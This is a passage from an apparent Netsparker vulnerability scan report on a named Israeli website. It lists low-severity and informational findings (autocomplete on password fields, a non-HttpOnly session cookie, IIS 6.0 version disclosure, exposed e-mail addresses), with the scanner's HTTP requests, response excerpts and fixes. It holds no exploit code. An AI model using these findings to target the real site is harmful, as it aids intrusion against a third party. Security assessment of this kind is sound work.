Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="ctlContent"><a name="dbsPgCnt"></a><div id="Body0"> <script type="text/javascript" language="javascript"> var nInterval; $(document).ready(function() { //Show Banner $(".main_ima …

5.5. /komuna http://www.tariel.co.il/komuna

Certainty Request GET /komuna HTTP/1.1 Referer: http://www.tariel.co.il/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="ctlContent"><a name="dbsPgCnt"></a><div id="Body0"> <script type="text/javascript" language="javascript"> var nInterval; $(document).ready(function() { //Show Banner $(".main_ima …

5.6. /megazin http://www.tariel.co.il/megazin

Certainty Request GET /megazin HTTP/1.1 Referer: http://www.tariel.co.il/shamaim Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; dbsVote32=32 Accept-Encoding: gzip, deflate

12 / 21


Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="Footer" class="clearfix"> <div id="NavHorizontalSimpleByID685"><ul id="navlist685" class="NavigationBarSimple NavigationBarSimpleByID685"><li cla …

5.7. /shamaim http://www.tariel.co.il/shamaim

Certainty Request GET /shamaim HTTP/1.1 Referer: http://www.tariel.co.il/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

Response … fg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev){cX=ev.pageX;cY=ev.pageY;};var compare=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);if((Math.abs(pX-cX)+Math.abs(pY-cY))<cfg.sensitivity){$(ob).unbind("mousemove",track);ob.hoverIntent_s=1;return cfg.over.apply(ob,[ev]);}else{pX=cX;pY=cY;ob.hoverIntent_t=setTimeout(function(){compare(ev,ob);},cfg.interval);}};var delay=function(ev,ob) {ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);ob.hoverIntent_s=0;return cfg.out.apply(ob,[ev]);};var handleHover=function(e){var p=(e.type=="mouseover"? e.fromElement:e.toElement)||e.relatedTarget;while(p&&p!=this){try{p=p.parentNode;}catch(e){p=this;}}if(p==this){return false;}var ev=jQuery.extend({},e);var ob=this;if(ob.hoverIntent_t){ob.hoverIntent_t=clearTimeout(ob.hoverIntent_t);}if(e.type=="mouseover") {pX=ev.pageX;pY=ev.pageY;$(ob).bind("mousemove",track);if(ob.hoverIntent_s!=1){ob.hoverIntent_t=setTimeout(function() {compare(ev,ob);},cfg.interval);}}else{$(ob).unbind("mousemove",track);if(ob.hoverIntent_s==1){ob.hoverIntent_t=setTimeout(function(){delay(ev,ob);},cfg.timeout);}}};return this.mouseover(handleHover).mouseout(handleHover);};})(jQuery); </script> <div id="Footer" class="clearfix"> <div id="NavHorizontalSimpleByID685"><ul id="navlist685" class="NavigationBarSimple NavigationBarSimpleByID685"><li cla …

13 / 21


6. Auto Complete Enabled "Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card". {PRODUCT} detected that auto complete is enabled in one or more of the form fields. These were either "password" fields or important fields, such as "Credit Card".

1 TOTAL LOW CONFIRMED

1

Impact Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.

Actions to Take 1. Add the attribute autocomplete="off" to the form tag or to individual "input" fields. 2. Find all instances of inputs that store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended. 3. Re-scan the application after addressing the identified issues to ensure all of the fixes have been applied properly.

Required Skills for Successful Exploitation Dumping all data from a browser can be fairly easy, and a number of automated tools exist to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References Using AutoComplete in HTML Forms

Classification CWE-16 WASC-15

6.1. / CONFIRMED http://www.tariel.co.il/?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage=

Identified Field Name Password

Request GET /?CategoryID=1797&ArticleID=4122&KeyWords=&SearchCategory=&SearchPage= HTTP/1.1 Referer: http://www.tariel.co.il/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

14 / 21


Response HTTP/1.1 200 OK Date: Mon, 26 May 2014 14:33:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 1015369 Content-Type: text/html; Charset=UTF-8 Cache-control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="he"> <!-- Daronet DBS2004 12/03/2014 11:32:00 -->

<head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="index,follow"> <meta http-equiv="X-UA-Compatible" content="IE=7, IE=9"> <title>‫<םיהוכ‬/title> <base href="http://www.tariel.co.il/"> <meta name="keywords" content=""> <meta name="description" content=""> <link rel="canonical" href="http://www.tariel.co.il/?categoryid=1797&articleid=4122" /> <script type="text/javascript" language="javascript" src="_JS/Funclib.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/Site/modFormValidatorHU.js"></script> <script type="text/javascript" language="javascript" src="http://support.daronet.com/Modules6/_Scripts/dbsAjax.js"></script> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type="text/javascript" language="javascript"> var sAppDomain = "http://www.tariel.co.il"; var sRatingMsg = "‫והיות‬ ‫;" י‬ var sOneStarMsg = "1 ‫;"ביבכ‬ var sTwoStarsMsg = "2 ‫;"ביבכוכ‬ var sThreeStarsMsg = "3 ‫;"ביבכוכ‬ var sFourStarsMsg = "4 ‫;"ביבכוכ‬ var sFiveStarsMsg = "5 ‫;"ביבכוכ‬ var c_styles = {}; var c_menus = {}; var c_hideTimeout = 500; // 1000==1 second var c_subShowTimeout = 250; var c_keepHighlighted = true; var c_findCURRENT = false; // find the item linking to the current page and apply it the CURRENT st …

15 / 21


7. Cookie Not Marked As HttpOnly Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks. {PRODUCT} identified a cookie not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

1 TOTAL LOW CONFIRMED

1

Impact During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.

Actions to Take 1. See the remedy for solution. 2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)

Remedy Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References OWASP HTTPOnly Cookies MSDN - ASP.NET HTTPOnly Cookies

Classification CWE-16 CAPEC-107 WASC-15

7.1. / CONFIRMED http://www.tariel.co.il/

Identified Cookie ASPSESSIONIDCCCTRQCB

Request GET / HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Accept-Encoding: gzip, deflate Connection: Keep-Alive

Response HTTP/1.1 200 OK Date: Mon, 26 May 2014 14:33:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 48760 Content-Type: text/html; Charset=UTF-8 Set-Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD; path=/ Cache-control: no-store, no-cache, must-revalidate, max-age=0 Pragma: no-cache Expires: Tue, 01 Jan 1971 02:00:00 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://w â&#x20AC;Ś

16 / 21


8. Forbidden Resource Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes. {PRODUCT} identified a forbidden resource. Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for informational purposes.

1 TOTAL INFORMATION CONFIRMED

1

Impact This issue is reported as additional information only. There is no direct impact arising from this issue.

8.1. /_Uploads/dbsBanners/ CONFIRMED http://www.tariel.co.il/_Uploads/dbsBanners/

Request GET /_Uploads/dbsBanners/ HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

Response HTTP/1.1 403 Forbidden Content-Length: 218 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 26 May 2014 14:33:07 GMT Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Expires: Tue, 01 Jan 1971 02:00:00 GMT <html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>

17 / 21


9. E-mail Address Disclosure Netsparker found e-mail addresses on the web site. {PRODUCT} identified an e-mail address disclosure.

1 TOTAL INFORMATION

Impact E-mail addresses discovered within the application can be used by both spam email engines and also brute-force tools. Furthermore, valid email addresses may lead to social engineering attacks.

Remedy Use generic email addresses such as contact@ or info@ for general communications and remove user/people-specific e-mail addresses from the website; should this be required, use submission forms for this purpose.

External References Wikipedia - E-Mail Spam

Classification OWASP A6 PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13

9.1. / http://www.tariel.co.il/

Found E-mails brian@cherne.net support@daronet.com

Certainty Request GET / HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Accept-Encoding: gzip, deflate Connection: Keep-Alive

Response â&#x20AC;Ś ml> * * @param f onMouseOver function || An object with configuration options * @param g onMouseOut function || Nothing (use configuration options object) * @author Brian Cherne <brian@cherne.net> */ (function($){$.fn.hoverIntent=function(f,g){var cfg={sensitivity:1,interval:0,timeout:0};cfg=$.extend(cfg,g?{over:f,out:g}:f);var cX,cY,pX,pY;var track=function(ev) {cX=ev.pageX;cY=ev.pageY; â&#x20AC;Ś * * Daronet Ltd. * * www.daronet.com * * <support@daronet.com> * *********************************************************************************/--> </body> </html>

18 / 21


10. IIS Version Disclosure Netsparker identified that the target web server is disclosing the IIS version in its HTTP response. This information might help an attacker gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

1 TOTAL INFORMATION

{PRODUCT} identified a version disclosure (IIS) in target web server's HTTP response. This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of IIS.

Impact An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Remedy Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Remedy References URLScan RemoveServerHeader Directive

10.1. /sitemap.xml http://www.tariel.co.il/sitemap.xml

Extracted Version Microsoft-IIS/6.0

Certainty Request GET /sitemap.xml HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

Response HTTP/1.1 200 OK Date: Mon, 26 May 2014 14:33:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 639 Content-Type: text/xml; Charset=utf-8 Cache-control: private <?xml version="1.0" encoding="utf-8"?> <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>http://www.tariel.co.il/CategoriesMap.xml</loc> <lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/ItemsMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/EventsMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/GalleryMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/ForumsMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> </sitemapindex>

19 / 21


11. Sitemap Identified Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.

1 TOTAL INFORMATION

{PRODUCT} detected a sitemap file on the target website.

Impact This issue is reported as additional information only. There is no direct impact arising from this issue.

11.1. /sitemap.xml http://www.tariel.co.il/sitemap.xml

Certainty Request GET /sitemap.xml HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

Response HTTP/1.1 200 OK Date: Mon, 26 May 2014 14:33:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 639 Content-Type: text/xml; Charset=utf-8 Cache-control: private <?xml version="1.0" encoding="utf-8"?> <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>http://www.tariel.co.il/CategoriesMap.xml</loc> <lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/ItemsMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/EventsMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/GalleryMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> <sitemap> <loc>http://www.tariel.co.il/ForumsMap.xml</loc><lastmod>2014-05-26</lastmod> </sitemap> </sitemapindex>

20 / 21


12. Robots.txt Identified Netsparker identified a possibly sensitive Robots.txt file with potentially sensitive content. {PRODUCT} detected a Robots.txt file with potentially sensitive content.

Impact

1 TOTAL INFORMATION CONFIRMED

1

Depending on the content of the file, an attacker might discover hidden directories. Ensure you have nothing sensitive exposed within this folder, such as the path of the administration panel.

Remedy If disallowed paths are sensitive, do not write them in the robots.txt, and ensure they are correctly protected by means of authentication.

12.1. /robots.txt CONFIRMED http://www.tariel.co.il/robots.txt

Interesting Robots.txt Entries Sitemap: /sitemap.xml

Request GET /robots.txt HTTP/1.1 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker) Cache-Control: no-cache Accept-Language: en-us,en;q=0.5 Host: www.tariel.co.il Cookie: ASPSESSIONIDCCCTRQCB=LEPILCEBIOEHNMPBBKHIJMHD Accept-Encoding: gzip, deflate

Response HTTP/1.1 200 OK Content-Length: 38 Content-Type: text/plain Last-Modified: Mon, 25 May 2009 11:04:46 GMT Accept-Ranges: bytes ETag: "1f1429d28ddc91:917" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 26 May 2014 14:33:11 GMT User-agent: * Sitemap: /sitemap.xml

21 / 21

Www tariel co il 801